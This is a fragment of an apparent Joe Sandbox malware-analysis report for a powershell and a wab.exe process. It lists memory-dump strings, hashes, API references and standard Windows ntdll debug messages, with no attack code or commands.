                            • Instruction Fuzzy Hash: 7FA1D3B1B4030B9FCB24DF78D94466ABBE2EB89310F148459EC029B395DA31DD45EBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-3512890053
                            • Opcode ID: 29d8a4a82089a8bf5bf529ad7ca1a8a1faace9aaedb106e221197c13e01e40d4
                            • Instruction ID: e1914b998bd331eb9eaed0fb7e2c647e489b9649c960aed7f24d4a22441cf77c
                            • Opcode Fuzzy Hash: 29d8a4a82089a8bf5bf529ad7ca1a8a1faace9aaedb106e221197c13e01e40d4
                            • Instruction Fuzzy Hash: 26C138B1B002068FCB245A79D84867ABBE7AFC5310F24847AE807CB356EF31D956D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l$4'^q$4'^q$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-3201190886
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-788909730
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$4'^q$4'^q$x.ok$-ok
                            • API String ID: 0-3244723969
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                            • API String ID: 0-3997570045
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$tl$tl
                            • API String ID: 0-223199581
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (o^q$(o^q$(o^q$(o^q
                            • API String ID: 0-1978863864
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l
                            • API String ID: 0-538009330
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,S~l$,S~l$p5nk$xS~l
                            • API String ID: 0-3704198172
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l
                            • API String ID: 0-538009330
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$$^q
                            • API String ID: 0-2125118731
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 84|l$84|l$tP^q$tP^q
                            • API String ID: 0-1698968335
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$$^q
                            • API String ID: 0-2125118731
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q
                            • API String ID: 0-2049395529
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:0%
                            Dynamic/Decrypted Code Coverage:95.7%
                            Signature Coverage:26.1%
                            Total number of Nodes:115
                            Total number of Limit Nodes:1

                            Control-flow Graph

                            APIs
                            • Sleep.KERNELBASE(00000005), ref: 04FC85D1
                            • NtProtectVirtualMemory.NTDLL(?,-0000101C,-00000018), ref: 04FC862A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_4f10000_wab.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryProtectSleepVirtual
                            • String ID: y
                            • API String ID: 3235210055-1802128518
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 19 23b735c0-23b735cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 16 23b72b60-23b72b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 18 23b72df0-23b72dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 17 23b72c70-23b72c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Strings
                            • double initialized or corrupted critical section, xrefs: 23BA5508
                            • Critical section address, xrefs: 23BA5425, 23BA54BC, 23BA5534
                            • Invalid debug info address of this critical section, xrefs: 23BA54B6
                            • Thread is in a state in which it cannot own a critical section, xrefs: 23BA5543
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA54E2
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA54CE
                            • undeleted critical section in freed memory, xrefs: 23BA542B
                            • Address of the debug info found in the active list., xrefs: 23BA54AE, 23BA54FA
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA540A, 23BA5496, 23BA5519
                            • Critical section address., xrefs: 23BA5502
                            • Thread identifier, xrefs: 23BA553A
                            • Critical section debug info address, xrefs: 23BA541F, 23BA552E
                            • corrupted critical section, xrefs: 23BA54C2
                            • 8, xrefs: 23BA52E3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            • Opcode ID: 58a4b6088956a90a909a8287f6c4e2320fefc168f9d4e77f333c71de4f1323f5
                            • Instruction ID: dd5daf49632bd58f5135232a728036f8cc492381c7d8ff1ca99db234cc3272d9
                            • Opcode Fuzzy Hash: 58a4b6088956a90a909a8287f6c4e2320fefc168f9d4e77f333c71de4f1323f5
                            • Instruction Fuzzy Hash: 05818AB1900748AFDF10CF98C884B9EBBB9FB48700F2441AAF558F7241D775AA40CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                            • API String ID: 0-3591852110
                            • Opcode ID: 28c7502829ea96384cbb20fcf573632ffd0c689ea48f5a5222c163381e5a9354
                            • Instruction ID: 5fe279f7379cb0bf71d63eaa72b2de3f04c4c4cba64d3d0b7417df940fe71d04
                            • Opcode Fuzzy Hash: 28c7502829ea96384cbb20fcf573632ffd0c689ea48f5a5222c163381e5a9354
                            • Instruction Fuzzy Hash: 3712D370604641DFD729DF28C480BA6BBF5FF09704FA885E9E49D8B652D734E982CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                            • API String ID: 0-3532704233
                            • Opcode ID: 1ee2eacf9ab9f4e7c93322f8d93eb3a66ccf43f76ba6c35ee0e39e73fc5ae75a
                            • Instruction ID: 9681b6db4cad319c4e94e50ecb7c3ee4d325c07eb4a84534a3f3c9e7b0949e51
                            • Opcode Fuzzy Hash: 1ee2eacf9ab9f4e7c93322f8d93eb3a66ccf43f76ba6c35ee0e39e73fc5ae75a
                            • Instruction Fuzzy Hash: 52B199729087419FC711DF24C480A5BBBE8EB88744F054ABFF9A8D7250D770DA48CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                            • API String ID: 0-3063724069
                            • Opcode ID: 3c91a3569589290ea8eeded49e24008c501f39c713da782abc0bfbcc74fa81a8
                            • Instruction ID: 34c0c79174be2a75aaf02fe5687f690b0a9e85d00cead8c57ac538af5abc7f58
                            • Opcode Fuzzy Hash: 3c91a3569589290ea8eeded49e24008c501f39c713da782abc0bfbcc74fa81a8
                            • Instruction Fuzzy Hash: 1DD1CEB2809395AFE731DE608840BABB7F8EB9C714F044DB9FA9497250D770C904C796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            • API String ID: 0-1700792311
                            • Opcode ID: 70bde8bbf68f9e5ce863e2106966b0551fbc5f08cee240deb738b4361d7c3f4d
                            • Instruction ID: efe4f594e5f677881a36ce24f15ed132990db137c22e6a3857c87b3fb081e56d
                            • Opcode Fuzzy Hash: 70bde8bbf68f9e5ce863e2106966b0551fbc5f08cee240deb738b4361d7c3f4d
                            • Instruction Fuzzy Hash: FBD1E171500B85DFCB11EFAAC440AADBBF1FF69700F8881A9E8599B662C738D941DB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • @, xrefs: 23B2D313
                            • @, xrefs: 23B2D0FD
                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 23B2D0CF
                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 23B2D196
                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 23B2D262
                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 23B2D146
                            • @, xrefs: 23B2D2AF
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 23B2D2C3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                            • API String ID: 0-1356375266
                            • Opcode ID: 50ab8c0e21f837034379bebcfaf909ab3a74f60712fcd5b0627ccb31dc15db52
                            • Instruction ID: fdf8a6cfd3f88ca5a9e97e339ea0cf1ac3423ed3a5387acbe9faa7cd5e64da24
                            • Opcode Fuzzy Hash: 50ab8c0e21f837034379bebcfaf909ab3a74f60712fcd5b0627ccb31dc15db52
                            • Instruction Fuzzy Hash: C8A15A729087459FD321DF24C484B5BBBE8FB88715F004ABFE6A896250D774DA08CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-523794902
                            • Opcode ID: 85a17dde962eaf17a9bc4224c8abfe40e4c65a21bd4e009871416e24e83a34b1
                            • Instruction ID: eba7df37ca239ed74c0b4fc82e0a54279979663f975ecac7e41d43ee3b9ca1ff
                            • Opcode Fuzzy Hash: 85a17dde962eaf17a9bc4224c8abfe40e4c65a21bd4e009871416e24e83a34b1
                            • Instruction Fuzzy Hash: 2742FF35608B819FC311DF28C498A1ABBE5FF98604F084ABEF599CB262D734D945CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                            • API String ID: 0-122214566
                            • Opcode ID: 9735c2ebd2b417ba5b284dca09daef764f854ca393beb060806c0dfc68ecb99f
                            • Instruction ID: d99820f96dcefff9241dd941d29a77331bb31bd96c5718bfe033d38a1e3142e1
                            • Opcode Fuzzy Hash: 9735c2ebd2b417ba5b284dca09daef764f854ca393beb060806c0dfc68ecb99f
                            • Instruction Fuzzy Hash: 85C14835E002559BDF14CF65C8A1B7E7BA5EF85300F0440F9EB81DB291E7B08A40D799
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-792281065
                            • Opcode ID: 142ca5417149d6b67cb49aa6d5845321a66ce62d1554600f80bfb637ac2dc478
                            • Instruction ID: 8eca882d6629dbe3050a748fb80114a57deabb76154371fe73d294e14768eb23
                            • Opcode Fuzzy Hash: 142ca5417149d6b67cb49aa6d5845321a66ce62d1554600f80bfb637ac2dc478
                            • Instruction Fuzzy Hash: 93915531F14B549BDB24EF68C994B9A7BA4EFA4B14F0401F9E910AB392D7748C01CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 23BA8181, 23BA81F5
                            • Loading import redirection DLL: '%wZ', xrefs: 23BA8170
                            • minkernel\ntdll\ldrinit.c, xrefs: 23B6C6C3
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 23BA81E5
                            • LdrpInitializeProcess, xrefs: 23B6C6C4
                            • LdrpInitializeImportRedirection, xrefs: 23BA8177, 23BA81EB
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            • Opcode ID: f2eb7f26ddab438155b7c10f007a80a86c20ce0e066e1239f01cc12f739edc69
                            • Instruction ID: 83d8338901abe33e7228a448705ef2140268a5138b4f5a5ce16b981f49a9dcfc
                            • Opcode Fuzzy Hash: f2eb7f26ddab438155b7c10f007a80a86c20ce0e066e1239f01cc12f739edc69
                            • Instruction Fuzzy Hash: A7311A716057459FC620EF68CD45E1A77E4EFA8B10F0405F8F9959B292E620ED04CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • Kernel-MUI-Number-Allowed, xrefs: 23B55247
                            • Kernel-MUI-Language-SKU, xrefs: 23B5542B
                            • Kernel-MUI-Language-Allowed, xrefs: 23B5527B
                            • Kernel-MUI-Language-Disallowed, xrefs: 23B55352
                            • WindowsExcludedProcs, xrefs: 23B5522A
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
